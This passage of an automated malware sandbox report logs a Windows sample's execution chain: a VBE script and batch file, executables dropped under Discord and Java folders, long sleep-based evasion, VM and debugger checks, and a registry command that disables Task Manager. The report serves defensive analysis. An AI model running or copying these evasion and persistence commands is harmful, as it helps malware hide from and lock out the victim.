                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\axSbriXt.log
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe TID: 5572Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe TID: 7428Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe TID: 7528Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7536Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7452Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -29514790517935264s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -600000s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -599875s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -599500s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -599235s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -599000s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -598891s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -598778s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -598641s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7644Thread sleep time: -3600000s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -598499s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -598360s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7644Thread sleep time: -300000s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -597969s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -597857s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -597688s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -597563s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -597406s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -597235s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -597123s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -596953s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -596828s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -596715s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -596605s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -596500s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -596390s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -596281s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -596167s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -596047s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -595938s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -595828s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -595719s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -595609s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -595500s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -595391s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -595266s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -595156s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -595047s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -594937s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -594827s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -594717s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -594608s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -594500s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -594391s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -594229s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -593323s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -593169s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -593062s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -592953s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -592833s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -592703s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -592591s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -592483s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -592374s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -592266s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -592156s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -592047s >= -30000s
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7600Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0058A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0058A69B
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0059C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0059C220
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0059E6A3 VirtualQuery,GetSystemInfo,0_2_0059E6A3
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming
                                    Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Local\discord
                                    Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Local
                                    Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user
                                    Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData
                                    Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll
                                    Source: Agentcomponentbrokermonitordhcp.exe, 00000005.00000002.1753216052.000000001D1B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                    Source: 1znAXdPcM5.exe, Agentcomponentbrokermonitordhcp.exe.0.dr, aXnWbWpBWYJmkhPMHrrUNM.exe1.5.dr, aXnWbWpBWYJmkhPMHrrUNM.exe0.5.dr, RuntimeBroker.exe.5.dr, aXnWbWpBWYJmkhPMHrrUNM.exe.5.dr Binary or memory string: RMqkqemUuiKkl0dOtBV
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe.5.dr Binary or memory string: Q4B1DqVDVXmAyxvmCi5C
                                    Source: Agentcomponentbrokermonitordhcp.exe, 00000005.00000002.1752499579.000000001B65A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: a-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
                                    Source: Agentcomponentbrokermonitordhcp.exe, 00000005.00000002.1752499579.000000001B65A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA
                                    Source: w32tm.exe, 0000001E.00000002.1793947102.000001FB2E1C8000.00000004.00000020.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4139533274.0000000000E47000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe API call chain: ExitProcess graph end node graph_0-25083
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe Process information queried: ProcessInformation
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Code function: 0_2_0059F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0059F838
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Code function: 0_2_005A7DEE mov eax, dword ptr fs:[00000030h] 0_2_005A7DEE
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Code function: 0_2_005AC030 GetProcessHeap, 0_2_005AC030
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe Process token adjusted: Debug
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe Process token adjusted: Debug
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe Process token adjusted: Debug
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Code function: 0_2_0059F9D5 SetUnhandledExceptionFilter, 0_2_0059F9D5
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Code function: 0_2_0059FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0059FBCA
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Code function: 0_2_005A8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_005A8EBD
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe Memory allocated: page read and write | page guard
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\ELi4IhX1eHmQ2UsaOienYgDzI4HKnyNJ9ZRwGYArPHIQTcsLe.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe "C:\Users\user\AppData\Roaming\/Local/discord/surrogateWinMonitordll/Agentcomponentbrokermonitordhcp.exe"
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IwAYZ2SgOs.bat"
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe "C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe"
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Code function: 0_2_0059F654 cpuid 0_2_0059F654
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_0059AF0F
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe Queries volume information: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
